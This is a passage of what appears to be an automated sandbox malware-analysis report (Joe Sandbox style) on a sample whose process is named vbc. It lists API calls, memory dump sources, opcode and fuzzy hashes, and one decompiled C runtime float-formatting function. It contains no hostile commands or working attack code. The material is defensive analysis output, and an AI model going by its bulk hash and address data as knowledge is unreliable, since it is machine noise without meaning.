                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,004062E5,004127C8,0000000C,0040A26B,00000000,00412748,0000000C,0040A2A5,004062E5,?,?,0040EB16,00000004,00412848,0000000C), ref: 0040A9F1
                                                                                                                                                                                            • GetLastError.KERNEL32(?,0040EB16,00000004,00412848,0000000C,0040AA72,004062E5,?,00000000,00000000,00000000,?,00407F8F,00000001,00000214), ref: 0040AA02
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2714421763-0
                                                                                                                                                                                            • Opcode ID: 8ee054100c25386e7e6bf49a22d9d0fe6e519841e9ea1bfdabd22a3f965e27af
                                                                                                                                                                                            • Instruction ID: e2150fc4865ee1d3db8e63113e5638ba8670b4d2d0790c28c3db45950ffd1fd9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ee054100c25386e7e6bf49a22d9d0fe6e519841e9ea1bfdabd22a3f965e27af
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3501A771945701AADF207BB1AD0AB4F7B609F40724F11453FF504B61C1CE7C8990CA5E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406DE2 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00406DE2(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E004066D3(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E004067C3(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00406CE8(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00406C2D(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                                                                                                                                                                                            0x00406de7
                                                                                                                                                                                            0x00406ded
                                                                                                                                                                                            0x00406e60
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406df4
                                                                                                                                                                                            0x00406df4
                                                                                                                                                                                            0x00406df7
                                                                                                                                                                                            0x00406e12
                                                                                                                                                                                            0x00406e15
                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                            0x00406e47
                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                            0x00406e1a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406e1c
                                                                                                                                                                                            0x00406e2e
                                                                                                                                                                                            0x00406e2e
                                                                                                                                                                                            0x00406e1a
                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                            0x00406e69
                                                                                                                                                                                            0x00406df9
                                                                                                                                                                                            0x00406e11
                                                                                                                                                                                            0x00406e11
                                                                                                                                                                                            0x00406df7

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3016257755-0
                                                                                                                                                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                            • Instruction ID: fc1663edae1a36477a36d3ec34c16c4e8e2cd2cbbf3421f7f24d220d1bd2972a
                                                                                                                                                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                            • Instruction Fuzzy Hash: F711553600024EBBCF125E95CC05CEE3F63BF18354B5A8426FE5969171D33AC9B1AB85
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 09F962D8 Relevance: 9.9, Strings: 7, Instructions: 1109COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: ,.*l$F;6k$F}Nk$tW$l$<6k$P$l$Z6k
                                                                                                                                                                                            • API String ID: 0-2376836688
                                                                                                                                                                                            • Opcode ID: f7bb5a1b116325141464cd3452b780e40d307ebe757c875ff178821f61dd0e85
                                                                                                                                                                                            • Instruction ID: ec8c972d852306c3be9b394dd62b60cda11a08ecbdaade3fc54f66949241a3db
                                                                                                                                                                                            • Opcode Fuzzy Hash: f7bb5a1b116325141464cd3452b780e40d307ebe757c875ff178821f61dd0e85
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7382A175B101294FDF79EB7C89A16BEB1D39B8A684F104879D00BDF360DF288D498792
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9EDD0 Relevance: 1.8, Strings: 1, Instructions: 525COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: |I
                                                                                                                                                                                            • API String ID: 0-777982666
                                                                                                                                                                                            • Opcode ID: d10205302e9b55eeffb7493c632f9a7f2cd4a2055bdaed16f681c5f8986af084
                                                                                                                                                                                            • Instruction ID: 2fa05ce64df98f3838440f2ad830499db5ee44ef8d7940b091d94fc87e20e02f
                                                                                                                                                                                            • Opcode Fuzzy Hash: d10205302e9b55eeffb7493c632f9a7f2cd4a2055bdaed16f681c5f8986af084
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8542DF74E012288FDB64DF64C955BEEBBB2AF89304F1095EAD40AAB350DB355E85CF40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9E790 Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: |I
                                                                                                                                                                                            • API String ID: 0-777982666
                                                                                                                                                                                            • Opcode ID: 11fa1974b9ccc3cb91aff199a0f31fd7c49096b121b392837e33c561bca1b8de
                                                                                                                                                                                            • Instruction ID: 51aef9c8b43a48b27c04e4f10511841ff8eeb64717f383b2e903335a14bf0b42
                                                                                                                                                                                            • Opcode Fuzzy Hash: 11fa1974b9ccc3cb91aff199a0f31fd7c49096b121b392837e33c561bca1b8de
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CF10274A012288FDB28DF64C951BDEBBB2BF89304F1085AAD509AB351DB359E85CF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F97EB8 Relevance: 1.1, Instructions: 1058COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 729284d7b0ad50a257baf136db82347fccda23b0731a148b193a84617e169c79
                                                                                                                                                                                            • Instruction ID: 1d7146b94180970d40e95f722e5e706a527553b14a09811d91704efa4daca551
                                                                                                                                                                                            • Opcode Fuzzy Hash: 729284d7b0ad50a257baf136db82347fccda23b0731a148b193a84617e169c79
                                                                                                                                                                                            • Instruction Fuzzy Hash: 21829D31B102158FDF18DF79C8946AEB7E2AF8A384F148469E406EB351DB349D46CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 073608F8 Relevance: .5, Instructions: 505COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 22d1624825936852a4f7ff8b96ed785ee51d66cc8b42e9a4a30ed539fb7609f7
                                                                                                                                                                                            • Instruction ID: 70d56266f05dcde855ac9b86ff306103b040f047c5885807c8df4d66c0f73492
                                                                                                                                                                                            • Opcode Fuzzy Hash: 22d1624825936852a4f7ff8b96ed785ee51d66cc8b42e9a4a30ed539fb7609f7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 582206B4901228CFDB65DF24C959BD9BBB2FF4A305F0084E9D50DAB2A1CB359A85CF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9C288 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1c20861d13eb8f6f32c13921740a65c0ba807974c1c65e0b7d989dc81dc95d76
                                                                                                                                                                                            • Instruction ID: bcd40dcfd4d475d541c49d9bbd1f7f1b645da0b18358b15c376a869d544db24b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c20861d13eb8f6f32c13921740a65c0ba807974c1c65e0b7d989dc81dc95d76
                                                                                                                                                                                            • Instruction Fuzzy Hash: 16F19E74E01228CFDB64DFA4C994BDDBBB2BB49305F1095AAD409AB340DB359A81CF51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9CA60 Relevance: .3, Instructions: 321COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 25b89632ba43877483f35d298a15d61bece5a9d11053a474c48f24043402ac32
                                                                                                                                                                                            • Instruction ID: 51eead73220b46dd3a30fb8be725cf43879db74533985b44724eab9d210cc919
                                                                                                                                                                                            • Opcode Fuzzy Hash: 25b89632ba43877483f35d298a15d61bece5a9d11053a474c48f24043402ac32
                                                                                                                                                                                            • Instruction Fuzzy Hash: DFE1CF74E012288FDB64DFA5C980BDDBBB2BF89304F1091AAD549AB350DB359E85CF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9E319 Relevance: .3, Instructions: 294COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 81ddc7715159f4186cf910be157595606d9b55f089e31d82a3ef1d53b37166ad
                                                                                                                                                                                            • Instruction ID: 402c5df3296c69febb525953646ed0a1aa8c1eed009859f03223d557fa3b6cb3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 81ddc7715159f4186cf910be157595606d9b55f089e31d82a3ef1d53b37166ad
                                                                                                                                                                                            • Instruction Fuzzy Hash: 14D1AF74E05218CFEB64CFA9C984B9DBBB2FF89304F1091A9D409AB355DB349A85CF11
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9FA2F Relevance: .3, Instructions: 293COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: dd97b8aa6df4304b6871e88d4a429ec9f642d5b3565be8621c588bccd6bc19db
                                                                                                                                                                                            • Instruction ID: 7670c7e13c6df6d672e543a81acc944bac95fd87beba19873fa8e841b55188d2
                                                                                                                                                                                            • Opcode Fuzzy Hash: dd97b8aa6df4304b6871e88d4a429ec9f642d5b3565be8621c588bccd6bc19db
                                                                                                                                                                                            • Instruction Fuzzy Hash: E5D1C174E01218CFEB68DFA5D894B9DBBB2BF89304F1091AAD409AB351DB355D85CF10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9D0B8 Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 70bcf5c0c44119ec21e97762b3244c2a32e89382079eb58b7f709142a0db9d52
                                                                                                                                                                                            • Instruction ID: 9d46e61f6193c9fcb4d5e98a074c270d2cac21feb107698749c6b4a5a6a7964e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 70bcf5c0c44119ec21e97762b3244c2a32e89382079eb58b7f709142a0db9d52
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DB1DE74E05218CFDB28DFB5D984B9DBBB2BF8A305F2080A9D409AB355DB355982CF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9E780 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1c7933605e86611b547e02e3bf890f5170afcb24c9ed35ad45d38ca85f08fe62
                                                                                                                                                                                            • Instruction ID: 3d26a826d1f06d5f516af0137f02b981363a9624c36c6d120fa320b075204b3a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7933605e86611b547e02e3bf890f5170afcb24c9ed35ad45d38ca85f08fe62
                                                                                                                                                                                            • Instruction Fuzzy Hash: C1A11374E012288FEF24DFA0C951B9EBBB2BF89304F1085AAD409AB355DB355E85CF51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09EF0CE8 Relevance: 4.4, Strings: 3, Instructions: 619COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: <9$T9$l9
                                                                                                                                                                                            • API String ID: 0-1859377606
                                                                                                                                                                                            • Opcode ID: 98ccfb0fb6580efa92daaa6fb38117de91ebe96915075f904ad1adf2341a0af7
                                                                                                                                                                                            • Instruction ID: 385e1c5cdb6210013a0e62b2a90a027ae340c8dcbd5f9b9f2d51fe2013ad3b7c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 98ccfb0fb6580efa92daaa6fb38117de91ebe96915075f904ad1adf2341a0af7
                                                                                                                                                                                            • Instruction Fuzzy Hash: AF22D330704249DFCB15DB64C960A7EBBA7BF89304F14946AE606CB7A2CF74DC458B52
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736359F Relevance: 3.9, Strings: 3, Instructions: 182COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 8cbg$Xv $n
                                                                                                                                                                                            • API String ID: 0-2224752767
                                                                                                                                                                                            • Opcode ID: f2ac746a4b1e81669f988a0f934a24770136f4c9fe608e09e4397afb4206f2b8
                                                                                                                                                                                            • Instruction ID: 80eba44ff1e6eaba58abef82d7c0e88443665e776dfd333a43df2b8b6733456a
                                                                                                                                                                                            • Opcode Fuzzy Hash: f2ac746a4b1e81669f988a0f934a24770136f4c9fe608e09e4397afb4206f2b8
                                                                                                                                                                                            • Instruction Fuzzy Hash: B0715A30911608CFCB14EFB8E45889DBBB6FF8A306F6096ADE412B7295DF319845CB11
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 073635C0 Relevance: 3.9, Strings: 3, Instructions: 169COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 8cbg$Xv $n
                                                                                                                                                                                            • API String ID: 0-2224752767
                                                                                                                                                                                            • Opcode ID: 54055bbff43b1bdeec932e4f55cc5ae0ef1307c827cac82866226d964665a67d
                                                                                                                                                                                            • Instruction ID: 58b9fe64ae67547efe33c808124e4261ff7d8473b4ec0f19b839534eaecd20b3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 54055bbff43b1bdeec932e4f55cc5ae0ef1307c827cac82866226d964665a67d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 55613770901608CFCB04EFB8E4488ADBBB6FF8A306F60966DE412B7294DF319845CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09EF14DA Relevance: 3.9, Strings: 3, Instructions: 109COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: |I$|I$|I
                                                                                                                                                                                            • API String ID: 0-2977622761
                                                                                                                                                                                            • Opcode ID: ea72a0393bb5d0d47151d771f1f3e1b0b27f23462c9dfa5354023a5d25148c1d
                                                                                                                                                                                            • Instruction ID: 8a001fc058f6d37cb2db18bc9d7647066dbe814355f9c1ff9ea11a19f7af0c4b
                                                                                                                                                                                            • Opcode Fuzzy Hash: ea72a0393bb5d0d47151d771f1f3e1b0b27f23462c9dfa5354023a5d25148c1d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2731A834708249CFCB159B74C460ABE7BB6EF89204F14906BD617CB2A2DB74DC15CB52
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07362FA1 Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 4! $8\
                                                                                                                                                                                            • API String ID: 0-3741826720
                                                                                                                                                                                            • Opcode ID: 664ebe14d8c08b8fc4054fc4111babcd6938662f370d63cc33b18b3049464924
                                                                                                                                                                                            • Instruction ID: 300be6a0b6a0222dc4bf890bcca44d62c9b598a5c0b7afa4fb418e78b23a39bc
                                                                                                                                                                                            • Opcode Fuzzy Hash: 664ebe14d8c08b8fc4054fc4111babcd6938662f370d63cc33b18b3049464924
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1561D174E00218CFCB08DFB5E59899DBBB2FF89301F60856AE819AB356DB355846CF40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07363C68 Relevance: 2.5, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Xv $dx
                                                                                                                                                                                            • API String ID: 0-2217502953
                                                                                                                                                                                            • Opcode ID: b8cf2f73803e9c844821f2486e2ff98676d15e67459003009298f8139435e604
                                                                                                                                                                                            • Instruction ID: 62b2c33bbac1592ceaba54618763d27336246437f34010c592665293fc8dc4cd
                                                                                                                                                                                            • Opcode Fuzzy Hash: b8cf2f73803e9c844821f2486e2ff98676d15e67459003009298f8139435e604
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AE092313006456FCB142BAAB98CE9F7ADAEBCA215B40447DE10EC3742DA612C0587A5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07369A0A Relevance: 2.0, Instructions: 1997COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: acb56216b45116cb644a19adada12ff778fd36a7613500b449294a72398da61a
                                                                                                                                                                                            • Instruction ID: 6c12e051fc8b2d069790fcac1e18fb4da784c2a48865bcb5578e2a168f3d9528
                                                                                                                                                                                            • Opcode Fuzzy Hash: acb56216b45116cb644a19adada12ff778fd36a7613500b449294a72398da61a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 82130F38905208EFCB169B60D7949D9B772FF5930AB1488AFDC1136B56CB3B8992DF01
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07369A48 Relevance: 2.0, Instructions: 1973COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
